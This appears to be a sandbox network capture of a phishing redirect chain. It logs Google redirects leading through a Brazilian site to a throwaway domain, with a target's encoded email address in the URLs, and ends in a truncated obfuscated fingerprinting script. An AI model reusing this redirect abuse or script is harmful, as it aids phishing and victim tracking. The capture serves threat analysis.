                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:17 UTC1214INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                                                                                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' npmcdn.com unpkg.com cdn.jsdelivr.net;
                                                                                                                                                                                                script-src 'self' 'unsafe-inline' npmcdn.com cdnjs.cloudflare.com unpkg.com unpkg.com cdn.jsdelivr.net;
                                                                                                                                                                                                style-src 'self' 'unsafe-inline' unpkg.com cdnjs.cloudflare.com fonts.googleapis.com cdn.jsdelivr.net;
                                                                                                                                                                                                font-src * data: 'self' 'unsafe-inline' fonts.gstatic.com;
                                                                                                                                                                                                frame-src 'self';
                                                                                                                                                                                                worker-src * data: 'unsafe-eval' 'unsafe-inline' blob:;
                                                                                                                                                                                                media-src 'self' d2rmfex73stak2.cloudfront.net;
                                                                                                                                                                                                img-src 'self' d2rmfex73stak2.cloudfront.net;
                                                                                                                                                                                                frame-ancestors 'none'
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:17 GMT
                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                Location: https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0$$$
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                2024-12-05 07:24:17 UTC138INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.849732172.217.17.674436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:19 UTC837OUTGET /url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1
                                                                                                                                                                                                Host: google.dz
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:20 UTC831INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                Location: https://www.google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-L_wgWvB5vcBSkddCdnutGg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:19 GMT
                                                                                                                                                                                                Expires: Sat, 04 Jan 2025 07:24:19 GMT
                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                2024-12-05 07:24:20 UTC416INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 64 7a 2f 75 72 6c 3f 71 3d 6e 72 6e 71 35 4a 4c 69 36 7a 33 79 68 26 61 6d 70 3b 72 63 74 3d 74 54 50 76 76 71 36 78 52 79 6a 37 59 30 30 78 44 6a 6e 6c 78 39 6b 49 6a 75 73 75 63 54 26 61 6d 70 3b 73 61
                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.dz/url?q=nrnq5JLi6z3yh&amp;rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&amp;sa


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.849735216.58.208.2274436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:22 UTC841OUTGET /url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1
                                                                                                                                                                                                Host: www.google.dz
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:22 UTC1097INHTTP/1.1 302 Found
                                                                                                                                                                                                Location: https://www.google.dz/amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-F76JFHlQ-kGaC-l1eaVxIg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:22 GMT
                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                Content-Length: 336
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                Set-Cookie: NID=519=XLauBolikN8BvpO6I94MfjjYrrc1I2vuKBeoFz4JwYCDpIAGHZr8E1dgQI4LBPJ-6O5XgjO_ZunkkZ8urlfPDzEznulx5_nu1vDHQ-TLJvT-m0xlD4v95igolfBrd2Ti4um52EBdiK-f8HKhG22KVw8g7Bo2crY6B0D0VdPzzUBvE7vIJHEDJCIlT6U0UVfiPaDc; expires=Fri, 06-Jun-2025 07:24:22 GMT; path=/; domain=.google.dz; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                2024-12-05 07:24:22 UTC293INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 64 7a 2f 61 6d 70 2f 73 2f 61 6c 76 6f 72 61 64 61 76 69 73 75 61 6c 2e 63 6f 6d 2e 62 72 2f 79 6f 79 61 2f 63 6a 62 68 2f 61 32 78 68 64 58 4d 75 62 57 46 6b 5a 58 4a 41 63 32 4a 76 4c 6d 4e 76 4c 6d 46
                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.dz/amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF
                                                                                                                                                                                                2024-12-05 07:24:22 UTC43INData Raw: 38 32 25 41 43 25 45 32 25 38 30 25 39 41 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                Data Ascii: 82%AC%E2%80%9A">here</A>.</BODY></HTML>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.849736216.58.208.2274436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:24 UTC987OUTGET /amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1
                                                                                                                                                                                                Host: www.google.dz
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: NID=519=XLauBolikN8BvpO6I94MfjjYrrc1I2vuKBeoFz4JwYCDpIAGHZr8E1dgQI4LBPJ-6O5XgjO_ZunkkZ8urlfPDzEznulx5_nu1vDHQ-TLJvT-m0xlD4v95igolfBrd2Ti4um52EBdiK-f8HKhG22KVw8g7Bo2crY6B0D0VdPzzUBvE7vIJHEDJCIlT6U0UVfiPaDc
                                                                                                                                                                                                2024-12-05 07:24:25 UTC856INHTTP/1.1 302 Found
                                                                                                                                                                                                Location: https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0$$$
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                X-Robots-Tag: noindex
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-6ouNW2rQhmzIfLK4R9oOAg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:25 GMT
                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                Content-Length: 284
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                2024-12-05 07:24:25 UTC284INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 76 6f 72 61 64 61 76 69 73 75 61 6c 2e 63 6f 6d 2e 62 72 2f 79 6f 79 61 2f 63 6a 62 68 2f 61 32 78 68 64 58 4d 75 62 57 46 6b 5a 58 4a 41 63 32 4a 76 4c 6d 4e 76 4c 6d 46 30 c3 a3 e2 82 ac e2 80 9a 24 24 24 c3 a3 e2 82 ac e2 80 9a
                                                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0$$$


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.849737191.252.140.514436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:27 UTC753OUTGET /yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1
                                                                                                                                                                                                Host: alvoradavisual.com.br
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:28 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:27 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                refresh: 0;url=https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0$$$
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                2024-12-05 07:24:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.849738191.252.140.514436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:29 UTC687OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                Host: alvoradavisual.com.br
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                Referer: https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:30 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:30 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                2024-12-05 07:24:30 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.849739164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:29 UTC833OUTGET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                Referer: https://alvoradavisual.com.br/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:30 UTC181INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:30 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                2024-12-05 07:24:30 UTC16203INData Raw: 37 37 66 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 30 54 35 28 54 2c 42 29 7b 76 61 72 20 6b 3d 61 30 54 34 28 29 3b 72 65 74 75 72 6e 20 61 30 54 35 3d 66 75 6e 63 74 69 6f 6e 28 48 2c 70 29 7b 48 3d 48 2d 30 78 31 62 61 3b 76 61 72 20 66 3d 6b 5b 48 5d 3b 72 65 74 75 72 6e 20 66 3b 7d 2c 61 30 54 35 28 54 2c 42 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 30 54 34 28 29 7b 76 61 72 20 61 6a 3d 5b 27 65 73 55 6d 4a 27 2c 27 75 6e 68 61 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 27 2c 27 65 6d 69 74 27 2c 27 6e 61 76 69 67 61 74 6f 72
                                                                                                                                                                                                Data Ascii: 77f5<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> function a0T5(T,B){var k=a0T4();return a0T5=function(H,p){H=H-0x1ba;var f=k[H];return f;},a0T5(T,B);}function a0T4(){var aj=['esUmJ','unhandledRejection','emit','navigator
                                                                                                                                                                                                2024-12-05 07:24:30 UTC14514INData Raw: 61 6e 74 47 61 72 64 65 5c 78 32 30 42 6b 5c 78 32 30 42 54 27 2c 27 75 6e 69 63 6f 64 65 53 65 74 73 27 2c 27 40 40 69 74 65 72 61 74 6f 72 27 2c 27 52 67 41 53 4a 27 2c 27 56 4c 41 4c 53 27 2c 27 27 2c 27 71 75 65 75 65 4d 69 63 72 6f 74 61 73 6b 27 2c 27 56 5a 77 4c 51 27 2c 27 5b 6f 62 6a 65 63 74 5c 78 32 30 49 6e 74 6c 5d 27 2c 27 56 51 58 65 45 27 2c 27 74 6f 4a 53 4f 4e 27 2c 27 52 78 69 6d 63 27 2c 27 64 65 76 69 63 65 4d 65 6d 6f 72 79 27 2c 27 6d 73 53 61 76 65 42 6c 6f 62 27 2c 27 64 61 74 61 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 63 61 6e 76 61 73 27 2c 27 5c 78 30 61 60 60 60 27 2c 27 4e 6f 74 5c 78 32 30 65 6e 6f 75 67 68 5c 78 32 30 61 72 67 75 6d 65 6e 74 73 27 2c 27 71 4c 54 6f 52 27 2c 27 43 61 6e 76 61 73 43 61 70 74 75
                                                                                                                                                                                                Data Ascii: antGarde\x20Bk\x20BT','unicodeSets','@@iterator','RgASJ','VLALS','','queueMicrotask','VZwLQ','[object\x20Intl]','VQXeE','toJSON','Rximc','deviceMemory','msSaveBlob','data','setAttribute','canvas','\x0a```','Not\x20enough\x20arguments','qLToR','CanvasCaptu
